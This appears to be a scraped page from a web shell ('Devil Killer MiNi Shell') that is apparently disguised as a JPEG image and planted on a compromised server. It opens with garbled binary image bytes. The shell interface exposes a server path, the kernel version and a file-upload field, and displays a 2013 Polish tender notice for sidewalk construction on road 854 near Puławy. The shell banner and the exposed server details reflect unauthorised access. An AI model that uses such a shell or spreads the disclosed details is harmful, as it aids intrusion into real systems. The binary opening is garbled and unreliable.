JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/218098-N-2013.html

<p class="kh_header"><b>Puławy: Budowa chodników w ciągu drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce na odcinkach:
1. Zadanie nr 1: w m. Borów, od km 12+485 do km 12+718, o długości 0,233 km
2. Zadanie nr 2: Annopol - Opoka, od km 0+945 do km 1+205, o długości 0,260 km</b><br>
<b>Numer ogłoszenia: 218098 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodników w ciągu drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce na odcinkach:
1. Zadanie nr 1: w m. Borów, od km 12+485 do km 12+718, o długości 0,233 km
2. Zadanie nr 2: Annopol - Opoka, od km 0+945 do km 1+205, o długości 0,260 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
1) Zadanie nr 1: 
Budowa chodnika w ciągu drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce w m. Borów na odcinku od km 12+485 do km 12+718, o długości 0,233 km:
a. Roboty pomiarowe; 
b. Roboty ziemne wraz z transportem urobku;
c. Profilowanie koryt i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni chodników i zjazdów;
d. Ustawienie obrzeży betonowych chodników i zjazdów na podsypce cementowo - piaskowej z wypełnieniem spoin zaprawą centową;
e. Wykonanie podbudowy z piasku stabilizowanego cementem Rm = 2,5 Mpa pod nawierzchnię chodnika;       
f. Wykonanie podbudowy z piasku stabilizowanego cementem Rm = 5,0 Mpa pod nawierzchnię zjazdów;      
g. Ułożenie chodników z kostki brukowej betonowej szarej Behaton gr. 6 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem;
h. Ułożenie zjazdów z kostki brukowej betonowej czerwonej Behaton gr. 8 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem;
i. Ułożenie na podsypce cementowo - piaskowej ścieków pochodnikowych z rur PCV grubościennych o średnicy 160 mm;
j. Plantowanie (obrobienie na czysto) powierzchni skarp;
k. Ułożenie przepustu rurowego z rur prefabrykowanych o średnicy 30 cm;
l. Przestawienie barier drogowych z rozbiórką i ponownym ustawieniem na odcinku od mostu na dł. 12 m . 
2) Zadanie nr 2:
Budowa chodnika w ciągu drogi wojewódzkiej nr 854 Annopol - Kosin - Antoniów - Gorzyce na odcinku Annopol - Opoka od km 0+945 do km 1+205, o długości 0,260 km:
a. Roboty pomiarowe; 
b. Roboty ziemne wraz z transportem urobku; 
c. Formowanie nasypów wraz z zagęszczeniem;
d. Ustawienie na podsypce cementowo - piaskowej wystających krawężników betonowych 20 x 30 cm wraz z wykonaniem ław betonowych (B10) z oporem pod krawężniki;
e. Ustawienie na podsypce piaskowej obrzeży betonowych 30 x 8 cm z wypełnieniem spoin zaprawą cementową;
f. Wykonanie podbudowy z piasku średnioziarnistego grubości 10 cm pod nawierzchnię chodnika;
g. Ułożenie na podsypce cementowo - piaskowej (4 cm) chodników z kostki brukowej betonowej szarej Behaton gr. 6 cm;
h. Wykonanie podbudowy z kruszywa łamanego 0/31,5 mm o grubości 15 cm pod nawierzchnię zjazdów;
i. Ustawienie na zjazdach, na podsypce cementowo - piaskowej wtopionych obrzeży betonowych 30 x 8 cm wraz z wypełnieniem spoin zaprawą cementową;    
j. Ułożenie na podsypce cementowo - piaskowej na nawierzchni zjazdów z kostki brukowej czerwonej Behaton gr. 8 cm wraz z wypełnieniem spoin piaskiem;
k. Ułożenie na podsypce piaskowej ścieków z elementów betonowych 60 x 50 x 15 cm;
l. Ułożenie na podsypce cementowo - piaskowej ścieków pochodnikowych z rur PCV o średnicy 160 mm;
m. Ułożenie pod zjazdami przepustów rurowych betonowych o średnicy 40 cm wraz ze ściankami skośnymi;
n. Ręczne plantowanie (obrobienie na czysto) powierzchni skarp i dna wykopów;
o. Wykonanie poszerzenia nawierzchni jezdni o szer. ok. 0,5 m, w tym :
- roboty ziemne z transportem urobku;
- Wykonanie podbudowy z gruntu stabilizowanego cementem Rm = 2,5 Mpa o grubości 12 cm wraz z pielęgnacją piaskiem i wodą;
- Wykonanie podbudowy z kruszywa łamanego o uziarnieniu 0/31,5 mm o grubości warstwy 20 cm;
- frezowanie nawierzchni bitumicznej o grubości do 4 cm z wywozem materiału z rozbiórki na odległość do 3 km .
- Wykonanie warstwy wiążącej nawierzchni z betonu asfaltowego o uziarnieniu 0/20 o grubości warstwy 7 cm, wraz z transportem samochodami samowyładowczymi (5-10 t);
- Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego o uziarnieniu 0/12,5 (dla KR-3), o grubości warstwy 5 cm, wraz z transportem samochodami samowyładowczymi (5-10 t);
2. Szczegółowy zakres robót ujęty jest w projekcie budowlano - wykonawczym, szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz przedmiarze robót, stanowiącym część pomocniczą w określeniu ilości robót.
Przedmiar robót ma charakter pomocniczy. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z dokumentacją projektową. Z uwagi na to, że umowa na roboty będzie umową ryczałtową, w przypadku wystąpienia w trakcie prowadzenia robót większej ilości robót w jakiejkolwiek pozycji nie będzie to mogło być uznane za roboty dodatkowe z żądaniem dodatkowego wynagrodzenia. 
Ewentualny brak w przedmiarze pewnych robót koniecznych do wykonania na podstawie dokumentacji projektowej (w tym w projekcie budowlano - wykonawczym) nie zwalania Wykonawcy od obowiązku ich wykonania na podstawie projektu w cenie umownej.  
Ilości robót w przedmiarze Wykonawca ma prawo skorygować do wielkości według własnych obliczeń na podstawie projektu budowlano - wykonawczego oraz Szczegółowych specyfikacji technicznych.  
3. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową, na  podstawie opracowanego we własnym zakresie i zatwierdzonego przez zarządzającego ruchem na drogach wojewódzkich Dyrektora ZDW w Lublinie projektu czasowej organizacji ruchu.     
4. Wykonawca przed przystąpieniem do wykonania robót zobowiązany jest do opracowania i zatwierdzenia planu BIOZ zgodnie z art. 21 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane z późn. zmian oraz Programu Zapewnienia Jakości.
5. Wykonawca zobowiązany jest do postępowania z odpadami powstałymi trakcie realizacji zamówienia zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z dnia 8. stycznia 2013, poz. 21).
6. Wykonawca zobowiązany jest do zawarcia na własny koszt odpowiednich umów ubezpieczenia z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej w czasie realizacji robót objętych umową oraz przedstawienia ich Zamawiającemu.
7. Wykonawca zobowiązany jest do wykonania powykonawczej inwentaryzacji geodezyjnej odcinka wykonanych robót i zarejestrowania jej we właściwym miejscowo Ośrodku Dokumentacji Geodezyjnej.  
8. Okres rękojmi dla robót objętych zamówieniem wynosi 3 lata od daty odbioru ostatecznego. 
9. Zamawiający dopuszcza możliwość składania ofert częściowych na pojedyncze zadania. Wykonawca może złożyć oferty na dowolną ilość zadań, wybranych przez siebie spośród zadań wyszczególnionych w pkt. III.
10. Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy). Za rozwiązania równoważne uznana będzie oferta na wykonanie budowy chodnika przy wykorzystaniu technologii, materiałów i sprzętu innego niż określone w SST, pod warunkiem, że ich parametry będą nie gorsze niż określone w SST.
Szacunkowa wartość zamówienia wynosi 202 953,37 zł netto.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zgodnie z art. 67 ust. 1 pkt. 6 ustawy PZP Zamawiający przewiduje udzielenie zamówień uzupełniających.
2. Wartość zamówień uzupełniających nie przekroczy 30 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.52-5, 45.23.32.00-1, 56.23.32.20-7, 56.23.32.22-1, 56.23.32.92-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 
a. Dla zadania nr 1: 1 500,00 zł, (słownie: tysiąc pięćset złotych 00/100).
b. Dla zadania nr 2: 4 000,00 zł, (słownie: cztery tysiące złotych 00/100).
7. Wadium może być wnoszone w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
8. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie w Kredyt Banku S.A. o/Lublin nr 89 1500 1520 1215 2004 1596 0000. Na poleceniu przelewu należy wpisać: Wadium - postępowanie przetargowe                nr R6.ST.371-01-6/13.
9. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
a. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez Zamawiającego. W myśl art. 63. ust. 3 pkt. 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63 c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
b. Wadium wnoszone przelewem (art. 45 ust. 7 ustawy Pzp) uważa się za wniesione w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert.
10. Zamawiający, zgodnie z art. 46 ust. 4a i 5 zatrzymuje wadium wraz odsetkami, jeżeli:
1) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
2) Wykonawca, którego oferta została wybrana:
a. Odmówił podpisania umowy na warunkach określonych w ofercie lub
b. Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy lub
c. Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku udziału polegającego na posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca oświadczy w formie pisemnej, że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykonać w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 robotę polegającą na budowie, przebudowie lub remoncie chodnika, o wartości minimum 60 000,00 zł brutto
i udokumentować, że roboty te zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wymagana ilość robót i ich wartość dotyczy również przypadku, gdy Wykonawca składa ofertę na oba zadania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku udziału polegającego na dysponowaniu potencjałem technicznym niezbędnym do wykonania zamówienia Wykonawca oświadczy w formie pisemnej, że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien dysponować osobą zdolną do pełnienia funkcji kierownika budowy, posiadającą uprawnienia budowlane branży drogowej.
Osoby przewidziane do pełnienia samodzielnych funkcji technicznych                      w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą prawo budowlane z dnia 7 lipca 1994 r. (z późn. zmianami) art. 12 ust. 1 ppkt. 2, ust. 7, art. 12 a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane z 1994 r., natomiast w przypadku osób, które uzyskały uprawnienia w innych krajach Unii Europejskiej posiadane uprawnienia muszą spełniać warunki określone w ustawie   z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych  w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63 poz. 394). Osoby spoza terytorium Rzeczypospolitej Polskiej muszą się legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług trans granicznych, wydanymi przez właściwe Rady Izby Inżynierów albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą Izbą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku udziału polegającego na znajdowaniu się w sytuacji ekonomicznej i finansowej, pozwalającej na wykonanie zamówienia Wykonawca oświadczy w formie pisemnej, że spełnia warunki, o których mowa w art. 22 ust. 1 ustawy Pzp .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda wskazania przez Wykonawcę w wykazie (zał. E) informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wniesienia wadium.
2) Oferta przetargowa z ceną netto i z podatkiem VAT (wzór - zał. A) wraz z tabelą / tabelami elementów rozliczeniowych (wzór - zał. A1, A2), opracowaną / opracowanymi przez Wykonawcę.
3) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić Podwykonawcy (wzór - zał. J).
4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
5) W przypadku podpisania oferty i innych dokumentów przez osobę/y które nie są wymienione w odpisie z właściwego rejestru, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/y podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na:
a. Zmianie terminu wykonania umowy w przypadku wystąpienia niekorzystnych warunków atmosferycznych (długotrwałych, obfitych opadów deszczu lub śniegu, itp.), uniemożliwiających wykonanie robót.
b. Zmianie osób kluczowych dla realizacji umowy, np. reprezentujących strony w przypadku wystąpienia niezależnych od stron okoliczności (tj. choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne).
c. Zmianie wynagrodzenia w przypadku, gdy zmianie ulegnie stawka podatku VAT.
3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RDW w Puławach, ul. Składowa 1a, 24-100 Puławy, pok. nr 11 (cena 61,00 zł) lub pocztą elektroniczną, po wcześniejszym wysłaniu zamówienia na adres: rdw.pulawy@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 08:00, miejsce: RDW Puławy, ul.Składowa 1a, 24-100 Puławy, pok. nr 12. Otwarcie ofert nastąpi 21.06.2013 r. w pok. nr 11 o g. 8:30, zbiorcze zest. ofert zamieszczone zostanie na stronie ZDW Lublin w dniu otwarcia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




